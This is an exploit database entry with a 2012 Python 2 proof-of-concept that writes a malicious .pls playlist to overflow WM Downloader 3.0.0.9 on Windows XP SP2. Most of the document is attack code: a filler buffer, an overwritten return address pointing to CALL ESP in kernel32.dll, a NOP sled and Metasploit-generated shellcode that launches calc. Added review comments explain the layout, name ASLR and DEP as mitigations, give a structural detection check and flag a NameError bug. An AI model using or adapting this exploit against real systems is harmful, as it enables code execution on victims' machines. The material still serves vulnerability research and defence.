WM Downloader 3.0.0.9 (.pls) Buffer Overflow Exploit



EKU-ID: 1880 CVE: OSVDB-ID:
Author: Tunisian spl01t3r Published: 2012-04-10 Verified: Verified


#+----------------------------------------------------------------------+
# Exploit Title: WM Downloader 3.0.0.9 (.pls) Buffer Overflow Exploit
# Date: 08/04/2012
# Author: Tunisian spl01t3r
# Tested on: windows XP sp2
# Greetz: Milw0rm 1337day.com
# 
#	 ____ (_) ____   ___
#	(  _ \| |(  _ \ / _ \
#	| | | | || | | x |_|
#	| ||_/|_|| ||_/ \___/
#	|_|      |_|
#	 _ 
#	(_)  ____   ____  ____     _____ 
#	| | /  __| /  __| \__ \   /  `  \ 
#	| | \___ \ \___ \  / _ \_ | Y Y  \
#	|_| |____/ |____/ (___  / |_|_|  /
#						  \/       \/                          
+----------------------------------------------------------------------+
#!/usr/bin/python

import sys,os
# Proof-of-concept generator for the .pls parsing overflow named in the header
# (WM Downloader 3.0.0.9, tested by the author on Windows XP SP2).
# Python 2 only: it uses print statements and raw_input.
# The script takes no input; it prints a banner and writes one file, ./iss.pls.
print "###############################################"
print "#           WM Downloader 3.0.0.9             #"
print "#             Tunisian_spl01t3r               #"
print "#           tn.spl01t3r@gmail.com             #"
print "#             fb.com/TN.spl0it3r              #"
print "###############################################\r\n"

# Opened in text mode and only closed by the last statement of the script.
# `file` and `buffer` shadow Python 2 builtins.
file=open('iss.pls','w')
# 26113 bytes of 0x41 ("A") used as filler ahead of the 4-byte value below.
buffer="\x41" * 26113   
# Four bytes in little-endian order, i.e. 0x7C8369F0. The variable name and the
# author's comment suggest this is meant to land on the saved return address.
# NOTE(review): this is an absolute address inside a system DLL, so the sample
# is tied to the build the author tested (header: Windows XP SP2). ASLR and DEP
# on later Windows versions are the relevant mitigations.
eip="\xF0\x69\x83\x7C"   # 7C8369F0 CALL ESP kernel32.dll
# 30 bytes of 0x90 placed between the 4-byte value and the payload.
nops="\x90" * 30     

# Generator banner as left by the author: a 160-byte encoded payload whose stated
# command is "calc", i.e. a visible marker of code execution and nothing more.
# The ten literals below are 16 bytes each, which matches Size=160.
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
shellcode = (
	"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
	"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"
	"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"
	"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"
	"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"
	"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"
	"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"
	"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"
	"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"
	"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba")
	   
# Write order: filler, 4-byte value, 0x90 run, payload = 26113 + 4 + 30 + 160
# = 26307 bytes in total.
# Detection note: a well-formed .pls playlist is short INI-style text that begins
# with "[playlist]". This output has no such header and no key=value lines, so a
# structural check on .pls files is enough to flag it.
file.write(buffer+eip+nops+shellcode)
print "\n [+] 3vil File Created  \n\n"
print "\n   enj0y ;)  \n\n"
# NOTE(review): `shell` is not defined anywhere in the visible script, so this
# statement raises NameError and the two statements below it are not reached.
print shell
raw_input("[+] Press any key to exit...")
file.close()


#+----------------------------------------------------------------------+
#[+] greetz to : BIbou sfaxien ; mech lazem ;tn_scorpion ; anas laaribi ;
#       jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
#	   
#	                      mAhna mAhna 
#	   
#[+] profile :  www.facebook.com/TN.spl0it3r    
#
#+----------------------------------------------------------------------+